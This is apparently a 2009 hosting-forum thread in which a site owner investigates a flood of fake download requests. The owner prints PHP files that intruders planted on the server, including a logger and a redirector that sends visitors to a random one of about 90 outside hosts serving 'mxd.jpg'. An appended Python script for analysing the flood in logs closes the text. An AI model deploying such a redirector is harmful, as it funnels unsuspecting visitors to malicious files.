Thread: Strange http query attack
-
04-09-2009, 03:30 AM #1 (Newbie)
Strange http query attack
Hello, I have had a problem since yesterday on one of my servers. I'm receiving between 200 and 300 hits per second from different IPs to a non-existent path on a site; the hits are going to different cracks, films and download queries. This site is a directory and it's not a warez or p2p site.
The site is onemilliondirectory.com, and I have suspended it because it was using a lot of resources on the first server; now it's being redirected to another location. I have placed some traffic trackers to determine the referer or any other useful info about the visitors, but the referer is always empty, and I think that they are fake users because the statcounter tracker does not recognize the visits.
For example, some of the hits are:
Code:
GET /suspended.page/?v=ABC%204%20KIDS%20Workshop%201.0.zip HTTP
GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1
GET /suspended.page/?v=[0]%20Msn%20Live%20Messenger%20Mobile.zip
GET /inactive.html?v=Able%20Photo%20Slide%20Show%202.2.5.5.zip
GET /suspended.page/?v=English%20Grammar%20Worksheet%201.4.zip
GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1
GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1
Code:
Host: 82.246.88.241
/inactive.html?a=Knowing.2009.TS.FRENCH.XVID-PaGlop.****.[emule-island.com].avi
Http Code: 200
Date: Apr 07 16:39:54
Http Version: HTTP/1.1
Size in Bytes: 262
Referer: -
Agent: Internet Explorer
P.S.: I was checking the stats of the site and I have seen this URL as the referer of one of the visits: blackhatbootcamp.com /affiliates.html. I'm not sure if it has any relation to the problem.
Thanks in advance
Daniel
-
04-09-2009, 10:46 AM #2 (Newbie)
Hi,
Use the command below to find any IP making a huge number of HTTP connections to your server.
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
If you want to block it automatically, you may install ddos_deflate
http://deflate.medialayer.com/
Regards,
we3cares tech
-
04-09-2009, 01:56 PM #3 (Newbie)
Hi, thanks for your reply. I have used the command, but there are no IPs using a huge number of connections; most are using 1 or 2 connections.
I have checked the folder structure of the site and I have found that there is a new folder called "1", and files with the names "logi.php", "log2.php", "ffs2.php", "4556.txt", "file_names.txt", "mxd.php", "down_log.txt", "emlog.txt", "f6fs.txt" and "servernames2.php".
Most of the files are empty; the file "file_names.txt" has a list of more than 11,000 records like:
Code:
Kana Clip 1.1.2.10.czip
ProStat 4.11.czip
Stellar Phoenix Solaris-Sparc 1.0.czip
YupooStream 1.0.10.czip
erb - Empty Recycle Bin 1.6.2.czip
Code:
<?
// Appends the requesting IP and the value of the "a" query parameter to down_log.txt
if (isset($_GET["a"])) {
    $fp = fopen("down_log.txt", "a");
    if ($fp) {
        fwrite($fp, $_SERVER['REMOTE_ADDR']." | ".$_GET["a"]."\n");
        fclose($fp);
    }
}
?>
Code:
<?php
// all the links are entered here; the visitor is redirected to one of them at random
$hosts = array(
    "http://ad.diapositivas.com/mxd.jpg", "http://ad.videoenlaces.com/mxd.jpg", "http://addressdev.com/mxd.jpg", "http://adndiario.com.ar/mxd.jpg",
    "http://affairedunet.com/mxd.jpg", "http://aisanti.com/mxd.jpg", "http://aislesofgreen.com/mxd.jpg", "http://ajholweg.nl/mxd.jpg",
    "http://anpopobbs.com/mxd.jpg", "http://anunciosgo.com.br/mxd.jpg", "http://artesecia.com/mxd.jpg", "http://azehntner.ch/mxd.jpg",
    "http://bardomineiro.com.br/mxd.jpg", "http://borkum.rotary1850.org/mxd.jpg", "http://carmendardalla.com/mxd.jpg", "http://cartavalurbana.com/mxd.jpg",
    "http://cefaleaemicrania.it/mxd.jpg", "http://centrojuma.es/mxd.jpg", "http://ciafer.com.br/mxd.jpg", "http://cifras.be/mxd.jpg",
    "http://clubtaurinoperalta.com/mxd.jpg", "http://coachrunning.be/mxd.jpg", "http://contactoangelico.com/mxd.jpg", "http://dedidm.agoride.com/mxd.jpg",
    "http://delcarnes.com.br/mxd.jpg", "http://dts-developpement.fr/mxd.jpg", "http://dunas.com.br/mxd.jpg", "http://electrovision-lacasa.com/mxd.jpg",
    "http://ellipseimage.com/mxd.jpg", "http://entdeveze.com/mxd.jpg", "http://equipoloemi.com/mxd.jpg", "http://faracemichele.com/mxd.jpg",
    "http://fengshuiar.com/mxd.jpg", "http://fotografiaspastor.com.br/mxd.jpg", "http://francobonaventura.net/mxd.jpg", "http://freshontime.ro/mxd.jpg",
    "http://gabrielasouto.com.br/mxd.jpg", "http://gcisl.com/mxd.jpg", "http://harmsen-degroot.nl/mxd.jpg", "http://hotelarbus.it/mxd.jpg",
    "http://hotelcapri.com.br/mxd.jpg", "http://jsahagung.110mb.com/mxd.jpg", "http://keystonesupplements.com/mxd.jpg", "http://kunstfoto-engel.com/mxd.jpg",
    "http://madurasputas.webspacemania.com/mxd.jpg", "http://maik.fgru.de/mxd.jpg", "http://masterbkr.com.br/mxd.jpg", "http://mespremierespartitions.fr/mxd.jpg",
    "http://myhomestore.biz/mxd.jpg", "http://paintballgalicia.com/mxd.jpg", "http://peartreevideo.com/mxd.jpg", "http://porntopia.oxyhost.com/mxd.jpg",
    "http://puchuni.com/mxd.jpg", "http://putitas.uni.cc/mxd.jpg", "http://quiromasajista.net/mxd.jpg", "http://rapidlabs.de/mxd.jpg",
    "http://ravestsoft.cl/mxd.jpg", "http://residencelucienpaye.fr/mxd.jpg", "http://s196859181.online.de/mxd.jpg", "http://s92091163.onlinehome.us/mxd.jpg",
    "http://shiatsu-mingmen.com/mxd.jpg", "http://songinnight.nayana.com/mxd.jpg", "http://soulens.com/mxd.jpg", "http://suoninversi.com/mxd.jpg",
    "http://tabuladas.com/mxd.jpg", "http://telefuglehund.org/mxd.jpg", "http://tinytelly.co.kr/mxd.jpg", "http://tsua.net/mxd.jpg",
    "http://villageostia.com/mxd.jpg", "http://vinabric.si/mxd.jpg", "http://web798.webbox180.server-home.org/mxd.jpg", "http://wtal-city.de/mxd.jpg",
    "http://www.aecisrl.com/mxd.jpg", "http://www.agriturismoilmandorlo.it/mxd.jpg", "http://www.aozora.co.kr/mxd.jpg", "http://www.appliteam.com/mxd.jpg",
    "http://www.bookmat.com/mxd.jpg", "http://www.bricomatica.net/mxd.jpg", "http://www.camel-schmuck.com/mxd.jpg", "http://www.dentalclubmercedescova.com/mxd.jpg",
    "http://www.harpadedavi.com/mxd.jpg", "http://www.joyhotels.com.br/mxd.jpg", "http://www.ktg.hg.pl/mxd.jpg", "http://www.nancycroes.com/mxd.jpg",
    "http://www.strcolatina.com.br/mxd.jpg", "http://www.superfrozentuna.eu/mxd.jpg", "http://yachtpoint.at/mxd.jpg", "http://yorukconstruction.com/mxd.jpg",
    "http://zenessens.fr/mxd.jpg"
);
// Redirect the visitor to a randomly chosen entry from the list above
header("Location: ".$hosts[rand(0, sizeof($hosts)-1)]);
?>
Code:
89.159.243.18 | Fantasy.All.Stars.3.XXX.DVDRip.MPEG1.CD2.mpg
83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi
89.159.243.18 | [Wii]Mario_Kart[PAL][ISO-Full].rar
83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi
201.86.66.44 | Steinberg.Cubase.SX.v3.0.2.623-H2O.rar
Code:
121.134.40.68:4661
83.233.165.234:4819
83.233.30.103:4500
72.172.89.125:4661
89.248.172.54:4500
I have deleted these files on the old server, changed the DNS records of the site and created it again on a new server, but if I activate it, the server just collapses: in a few seconds the CPU use is 100%, and the only way to fix it is to restart and suspend the site again.
Thanks
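Because the per-IP connection count from post #2 stays at 1 or 2 when the flood is spread across many sources (post #3), the access log is the better place to characterise it. This is an added example, not code from the thread: it assumes the Apache/nginx combined log format, and SAMPLE_LOG is constructed to mirror the requests quoted above (documentation-range IPs).

```python
"""Spot a distributed fake-download flood in an access log (added example, not from the thread).
Assumes the Apache/nginx "combined" log format; SAMPLE_LOG is constructed to mirror the
thread's requests (non-existent pages hit with ?v=/?a=<download name>, empty referer).
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Query keys and file extensions seen in the thread's requests.
FLOOD_QUERY = re.compile(r'[?&][va]=[^&]*\.(zip|czip|avi|rar|mpg)$', re.IGNORECASE)

SAMPLE_LOG = """\
192.0.2.10 - - [07/Apr/2009:16:39:54 +0000] "GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1" 200 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.11 - - [07/Apr/2009:16:39:54 +0000] "GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1" 200 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [07/Apr/2009:16:39:54 +0000] "GET /inactive.html?a=Some.Film.2009.DVDRip.avi HTTP/1.1" 200 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.10 - - [07/Apr/2009:16:39:55 +0000] "GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1" 200 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.5 - - [07/Apr/2009:16:39:55 +0000] "GET /suspended.page/?v=ProStat%204.11.czip HTTP/1.1" 200 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.9 - - [07/Apr/2009:16:39:55 +0000] "GET /index.php HTTP/1.1" 200 8412 "http://www.google.com/" "Mozilla/5.0"
203.0.113.9 - - [07/Apr/2009:16:39:56 +0000] "GET /inactive.html?v=Legit%20File.zip HTTP/1.1" 200 262 "http://onemilliondirectory.com/" "Mozilla/5.0"
"""

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_flood_hit(rec):
    """Download-style query on a page the site never served, arriving with no referer."""
    return bool(FLOOD_QUERY.search(rec["path"])) and rec["referer"] in ("", "-")

def analyse_log_text(text):
    """Summarise flood traffic: total hits, distinct sources, peak rate, heaviest single IP."""
    per_second, per_ip = Counter(), Counter()
    for line in text.splitlines():
        rec = parse(line)
        if rec and is_flood_hit(rec):
            per_second[rec["ts"]] += 1   # combined-format timestamps have 1-second resolution
            per_ip[rec["ip"]] += 1
    return {
        "flood_hits": sum(per_ip.values()),
        "distinct_ips": len(per_ip),
        "peak_per_second": max(per_second.values(), default=0),
        "max_per_ip": max(per_ip.values(), default=0),
    }

if __name__ == "__main__":
    print(analyse_log_text(SAMPLE_LOG))
```

A high peak rate with many distinct IPs but a low max_per_ip is exactly the shape that per-IP connection counting (netstat | uniq -c) cannot surface, and it argues for dropping the ?v=/?a= requests cheaply at the web server rather than blocking source addresses.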